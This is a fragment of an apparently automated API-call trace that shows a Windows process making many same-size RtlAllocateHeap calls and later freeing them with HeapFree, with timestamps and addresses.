[0277.237] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x200ef70 [0277.237] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2022180 [0277.238] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2035390 [0277.339] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x20485a0 [0277.339] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x205b7b0 [0277.340] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x206e9c0 [0277.340] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2081bd0 [0277.340] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1f8) returned 0x5e8910 [0277.340] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5db0b0 | out: hHeap=0x5d0000) returned 1 [0277.340] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2094de0 [0277.341] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x20a7ff0 [0277.342] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x20bb200 [0277.343] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x20ce410 [0277.343] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x20f0080 [0277.344] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2103290 [0277.345] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x21164a0 [0277.345] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x21296b0 [0277.346] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x213c8c0 [0277.346] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x214fad0 [0277.347] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2162ce0 [0277.347] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2175ef0 [0277.348] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2189100 [0277.348] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x219c310 [0277.349] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x21af520 [0277.349] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x21c2730 [0277.350] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x21d5940 [0277.350] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x21e8b50 [0277.351] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x21fbd60 [0277.351] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x220ef70 [0277.352] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2222180 [0277.352] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x2f0) returned 0x5e8b10 [0277.352] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e8910 | out: hHeap=0x5d0000) returned 1 [0277.352] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2235390 [0277.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x22485a0 [0277.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x225b7b0 [0277.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x226e9c0 [0277.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2281bd0 [0277.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2294de0 [0277.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x22a7ff0 [0277.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x22bb200 [0277.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x22ce410 [0277.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x22e1620 [0277.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x22f4830 [0277.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2307a40 [0277.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x231ac50 [0277.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x232de60 [0277.360] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2341070 [0277.360] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2354280 [0277.360] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2367490 [0277.361] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x237a6a0 [0277.361] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x238d8b0 [0277.362] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x23a0ac0 [0277.362] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x23b3cd0 [0277.363] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x23c6ee0 [0277.363] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x23da0f0 [0277.364] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x23ed300 [0277.364] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2400510 [0277.365] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2413720 [0277.365] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2426930 [0277.366] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2439b40 [0277.366] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x244cd50 [0277.366] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x245ff60 [0277.367] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2473170 [0277.367] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x468) returned 0x5fc5f0 [0277.367] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e8b10 | out: hHeap=0x5d0000) returned 1 [0277.367] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2486380 [0277.368] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2499590 [0277.368] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x24ac7a0 [0277.369] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x24bf9b0 [0277.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x24d2bc0 [0277.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x24f0080 [0277.372] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2503290 [0277.373] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x25164a0 [0277.373] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x25296b0 [0277.374] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x253c8c0 [0277.471] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x254fad0 [0277.472] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2562ce0 [0277.472] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2575ef0 [0277.473] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2589100 [0277.473] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x259c310 [0277.473] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x25af520 [0277.474] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x25c2730 [0277.474] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x25d5940 [0277.475] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x25e8b50 [0277.475] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x25fbd60 [0277.475] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x260ef70 [0277.476] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2622180 [0277.476] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2635390 [0277.476] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x26485a0 [0277.477] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x265b7b0 [0277.477] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x266e9c0 [0277.477] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2681bd0 [0277.477] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2694de0 [0277.478] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x26a7ff0 [0277.478] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x26bb200 [0277.478] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x26ce410 [0277.479] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x26e1620 [0277.480] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x26f4830 [0277.480] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2707a40 [0277.480] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x271ac50 [0277.481] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x272de60 [0277.482] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2741070 [0277.482] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2754280 [0277.483] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2767490 [0277.484] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x277a6a0 [0277.484] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x278d8b0 [0277.485] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x27a0ac0 [0277.485] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x27b3cd0 [0277.486] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x27c6ee0 [0277.486] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x27da0f0 [0277.487] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x27ed300 [0277.487] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2800510 [0277.488] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x698) returned 0x5e8910 [0277.488] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5fc5f0 | out: hHeap=0x5d0000) returned 1 [0277.488] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2813720 [0277.488] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2826930 [0277.489] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2839b40 [0277.489] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x284cd50 [0277.490] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x285ff60 [0277.490] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2873170 [0277.491] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2886380 [0277.491] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2899590 [0277.491] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x28ac7a0 [0277.492] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x28bf9b0 [0277.492] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x28d2bc0 [0277.493] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x28e5dd0 [0277.493] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x28f8fe0 [0277.494] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x290c1f0 [0277.494] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x291f400 [0277.495] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2932610 [0277.495] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2945820 [0277.496] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2958a30 [0277.496] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x296bc40 [0277.497] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x297ee50 [0277.497] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2992060 [0277.498] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x29a5270 [0277.498] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x29b8480 [0277.499] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x29cb690 [0277.499] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x29de8a0 [0277.500] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x29f1ab0 [0277.500] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2a04cc0 [0277.500] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2a17ed0 [0277.502] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2a2b0e0 [0277.502] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2a3e2f0 [0277.503] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2a51500 [0277.504] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2a64710 [0277.505] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2a77920 [0277.505] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2a8ab30 [0277.506] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2a9dd40 [0277.506] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2ab0f50 [0277.619] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2ac4160 [0277.619] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2ad7370 [0277.620] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2aea580 [0277.620] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2afd790 [0277.621] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2b109a0 [0277.621] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2b23bb0 [0277.622] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2b36dc0 [0277.622] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2b49fd0 [0277.622] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2b5d1e0 [0277.623] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2b703f0 [0277.623] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2b83600 [0277.624] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2b96810 [0277.624] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2ba9a20 [0277.624] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2bbcc30 [0277.625] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2bcfe40 [0277.626] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2be3050 [0277.626] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2bf6260 [0277.626] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2c09470 [0277.627] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2c1c680 [0277.627] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2c2f890 [0277.628] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2c42aa0 [0277.628] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2c55cb0 [0277.629] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2c68ec0 [0277.629] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2c7c0d0 [0277.629] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2c8f2e0 [0277.630] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2ca24f0 [0277.630] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2cb5700 [0277.631] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2cc8910 [0277.631] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2cf0080 [0277.632] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2d03290 [0277.633] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2d164a0 [0277.633] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2d296b0 [0277.634] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2d3c8c0 [0277.634] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2d4fad0 [0277.634] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x9e0) returned 0x5fc5f0 [0277.634] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e8910 | out: hHeap=0x5d0000) returned 1 [0277.634] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2d62ce0 [0277.635] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2d75ef0 [0277.635] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2d89100 [0277.636] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2d9c310 [0277.636] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2daf520 [0277.637] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2dc2730 [0277.637] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2dd5940 [0277.638] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2de8b50 [0277.639] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2dfbd60 [0277.639] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2e0ef70 [0277.640] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2e22180 [0277.640] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2e35390 [0277.641] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2e485a0 [0277.641] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2e5b7b0 [0277.641] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x13200) returned 0x2e6e9c0 [0277.814] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5fc5f0 | out: hHeap=0x5d0000) returned 1 [0283.702] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x607480 | out: hHeap=0x5d0000) returned 1 [0283.702] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x627280 | out: hHeap=0x5d0000) returned 1 [0283.702] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63a490 | out: hHeap=0x5d0000) returned 1 [0283.702] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x64d6a0 | out: hHeap=0x5d0000) returned 1 [0283.702] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6608b0 | out: hHeap=0x5d0000) returned 1 [0283.702] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x673ac0 | out: hHeap=0x5d0000) returned 1 [0283.702] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x686cd0 | out: hHeap=0x5d0000) returned 1 [0283.702] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x699ee0 | out: hHeap=0x5d0000) returned 1 [0283.702] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6ad0f0 | out: hHeap=0x5d0000) returned 1 [0283.702] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1df0080 | out: hHeap=0x5d0000) returned 1 [0283.702] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1e03290 | out: hHeap=0x5d0000) returned 1 [0283.702] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1e164a0 | out: hHeap=0x5d0000) returned 1 [0283.702] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1e296b0 | out: hHeap=0x5d0000) returned 1 [0283.703] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1e3c8c0 | out: hHeap=0x5d0000) returned 1 [0283.703] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1e4fad0 | out: hHeap=0x5d0000) returned 1 [0283.703] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1e62ce0 | out: hHeap=0x5d0000) returned 1 [0283.703] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1e75ef0 | out: hHeap=0x5d0000) returned 1 [0283.703] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1e89100 | out: hHeap=0x5d0000) returned 1 [0283.703] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1e9c310 | out: hHeap=0x5d0000) returned 1 [0283.703] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1eaf520 | out: hHeap=0x5d0000) returned 1 [0283.703] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1ec2730 | out: hHeap=0x5d0000) returned 1 [0283.703] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1ef0080 | out: hHeap=0x5d0000) returned 1 [0283.703] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1f03290 | out: hHeap=0x5d0000) returned 1 [0283.703] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1f164a0 | out: hHeap=0x5d0000) returned 1 [0283.703] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1f296b0 | out: hHeap=0x5d0000) returned 1 [0283.703] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1f3c8c0 | out: hHeap=0x5d0000) returned 1 [0283.718] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1f4fad0 | out: hHeap=0x5d0000) returned 1 [0283.720] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1f62ce0 | out: hHeap=0x5d0000) returned 1 [0283.720] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1f75ef0 | out: hHeap=0x5d0000) returned 1 [0283.720] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1f89100 | out: hHeap=0x5d0000) returned 1 [0283.720] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1f9c310 | out: hHeap=0x5d0000) returned 1 [0283.720] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1faf520 | out: hHeap=0x5d0000) returned 1 [0283.720] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1fc2730 | out: hHeap=0x5d0000) returned 1 [0283.720] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1fd5940 | out: hHeap=0x5d0000) returned 1 [0283.720] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1fe8b50 | out: hHeap=0x5d0000) returned 1 [0283.724] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x1ffbd60 | out: hHeap=0x5d0000) returned 1 [0283.724] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x200ef70 | out: hHeap=0x5d0000) returned 1 [0283.724] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2022180 | out: hHeap=0x5d0000) returned 1 [0283.724] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2035390 | out: hHeap=0x5d0000) returned 1 [0283.724] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x20485a0 | out: hHeap=0x5d0000) returned 1 [0283.724] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x205b7b0 | out: hHeap=0x5d0000) returned 1 [0283.724] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x206e9c0 | out: hHeap=0x5d0000) returned 1 [0283.724] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2081bd0 | out: hHeap=0x5d0000) returned 1 [0283.724] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2094de0 | out: hHeap=0x5d0000) returned 1 [0283.724] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x20a7ff0 | out: hHeap=0x5d0000) returned 1 [0283.724] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x20bb200 | out: hHeap=0x5d0000) returned 1 [0283.724] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x20ce410 | out: hHeap=0x5d0000) returned 1 [0283.724] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x20f0080 | out: hHeap=0x5d0000) returned 1 